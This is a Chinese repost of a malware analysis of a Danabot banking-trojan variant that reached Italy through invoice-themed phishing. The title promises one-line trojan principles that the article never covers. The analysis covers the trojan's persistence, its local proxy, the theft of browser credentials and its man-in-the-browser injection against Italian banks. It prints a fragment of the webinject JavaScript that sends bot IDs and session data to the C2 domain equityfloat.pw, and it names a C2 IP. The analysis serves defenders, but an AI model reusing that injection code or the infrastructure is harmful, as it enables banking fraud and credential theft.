一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(1)

尽管Proofpoint和Eset等安全公司早在今年5月份就曾针对在澳大利亚传播的Danabot样本进行了全面的分析,但就在过去的几周里,一个新的Danabot变种再次袭击了意大利。在这篇文章中,Cybaze-Yoroi ZLab将对最近通过以“fattura(发票)”为主题的网络钓鱼电子邮件(例如,N051118)在意大利传播的Danabot变种之一进行剖析。值得注意的是,这个变种滥用了包含嵌入式宏的Word文档来下载恶意dll paylaod。

技术分析

首先,这个新的Danabot变种会尝试通过加密的SSL通道连接到远程主机149.154.157.104(EDIS-IT IT),然后下载其他组件并从文件系统中删除自己。与此同时,它还会在“HKLM\SYSTEM\CurrentControlSet\Services”注册表项中设置了一个系统服务。以下注册表项被用于加载位于“C:\ProgramData\D93C2DAC”文件夹中的DLL,该文件夹被配置为“只读”和“隐藏”。

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(2)

图1.恶意软件创建的注册表项

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(3)

图2. D93C2DAC文件夹

这个隐藏文件夹包含两个处于执行中的组件:“D93C2D32.dll”和“D93C2D64.dll”。实际上,它们是两个完全相同的组件,区别在于一个是32位,一个是64位。显然,它们是针对不同体系机构的目标主机设计的,但都通过rundll32.exe进程执行。

也就是说,恶意DLL至少会被加载两次(一次加载D93C2D32.dll,一次加载D93C2D64.dll),且每次的参数都不同,具体取决于要导出的函数(针对不同体系机构的目标主机):

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(4)

图3.恶意DLL导出的函数

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(5)

图4.恶意软件的执行示例

如图3所示,恶意DLL最终会导出8个关键函数:“f1”、“f2”、“f3”、“f4”、“f5”、“f6”、“f7”和“f8”。其中,“f1”被用于将恶意软件安装到目标主机中,而“f4”和“f5”则被用于实现持久性。具体来说,“f5”被用于在本地端口1080上设置一个系统转发代理。如此一来,目标主机与Internet之间的所有通信都将通过代理进行,使得恶意软件能够拦截和篡改网络流量。相对应的,“f4”被用于管理流量并执行Man-In-The-Browser攻击。如此一来,从目标主机到Internet的所有DNS呼叫都将被篡改,以与恶意软件中硬编码的银行网站列表相匹配。恶意软件会在原始页面中添加了一段javascript代码,以窃取用户名、密码和会话cookie等敏感信息。

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(6)

图5.执行中的监听代理

在执行上述函数的过程中,恶意软件还会搜索存储在已安装Web浏览器(如Google Chrome和Mozilla Firefox)数据文件夹中的敏感信息,如保存的凭证。然后,它会将收集到的凭证存储在位于“C:\WINDOWS\TEMP”路径下的一个临时SQLite数据库中。

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(7)

图6.带有被盗凭证的临时SQLite数据库

Man-In-The-Browser攻击

为了能够执行Man-In-The-Browser攻击,恶意软件设置了一个系统转发代理,如图7所示。通过这种方式,它能够检查所有传入和传出的internet流量。当受害者访问任意一个目标网站的特定网页时,恶意软件都会将一段自定义javascript代码注入该页面,以窃取敏感的用户信息,如个人详细信息、凭证和PAN码。如上所述,这个代理是由恶意DLL的“ f4 ”函数负责管理的。

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(8)

图7.代理设置

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(9)

图8.恶意软件的代码片段

通过对恶意软件样本源代码的分析,Cybaze-Yoroi ZLab得到了其目标网页的完整列表。从这份列表来看,该恶意软件针对的是各种金融机构的客户,且大多数都是意大利银行的客户,如Bancoposte、Intesa San Paolo、Banca Generali、BNL、Hello Bank、UBI Banca等。除了银行网站之外,恶意软件还针对了一些电子邮件服务提供商,如Tim、Yahoo、Hotmail、GMail等国际通用的电子邮件服务,以及与 Tecnocasa等意大利房地产公司相关的其他更具体的电子邮件服务。

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(10)

图9.没有被注入脚本的银行网站

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(11)

图10.被注入脚本的银行网站

Web-Inject

被注入网页的恶意javascript会将被盗信息发送给C2,包括受害者的会话cookie。如下代码片段是从“ http://equityfloat[.]pw/hc/myjs28frr_s51.js”下载的webinject代码。

一句话木马原理(深入剖析在意大利肆掠的Danabot木马新变种)(12)

图11.从equityfloat[.]pw C2下载的javascript

这段Webinject代码被用于检查恶意php资源“/my9rep/777.php”,以及将包括bot-id在内的受感染主机详细信息和当前会话cookie发送给C2。

var wwww = 'https://equityfloat.pw/';

wwww = "https://" document.location.host "/";

var waitdiv = "<center id=\"fkwt\" class=\"fkwt\"> <br/> Poczekaj aż Twój komputer zostanie zidentyfikowany. Może to potrwać trochę czasu... <br/><img src=\"" wwww "/my9rep/777.php?imgto=wait\"></img></center>";

var waitfk = "";

var waitlok = "<div><center> <br/> Prowadzone sa prace modernizacyjne w celu jak najszybszego przywrocenia dzialania systemu.<br/>Przyblizony czas modernizacji wynosi kilka godzin.<br/>Przepraszamy za tymczasowe utrudnienie i niedogodnosci.<br/><center></div>";

var netbot = "frr";

var rem777bname2 = "";

var tbid = my7ajx("#myjs1[data-botid]");

if (tbid.length > 0) rem777bname2 = tbid.attr("data-botid");

var loca = location.href;

var tyyp = true;

var apan = wwww "/my9rep/777.php?typ=" document.location.host "&sub=" netbot "&b=2&inf=" rem777bname2;

var args = {};

var tmp1;

var tkstate = 1;

var lg = "",

ps = "",

tk = "";

var lgf;

var pss;

var tabl;

var tabltr;

var btn;

var clickfnc;

var ansq = false;

需要指出的是,该恶意软件使用了一个自定义的JQuery脚本“var tbid=my7ajx(“#myjs1[data-botid]”);”来设置受感染主机的bot-id,而这个bot-id与C2 “equityfloat.]com”php页面的路径联系在一起。

var apan = wwww "/my9rep/777.php?typ=" document.location.host "&sub=" netbot "&b=2&inf=" rem777bname2;

通过这种方式,攻击者可以获知MitB代理是否注入成功。

总结

在过去的一年里,Danabot已经将其活动范围扩大到了意大利,尤其是在今年11月份(例如,N051118)期间,Cybaze-Yoroi ZLab就拦截了一波大规模的攻击浪潮。从恶意软件样本所针对的目标来看,网络犯罪分子对意大利用户和组织的兴趣正在日益增加,且不仅仅局限于传统的银行业。

本文由 黑客视界 综合网络整理,图片源自网络;转载请注明“转自黑客视界”,并附上链接。

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页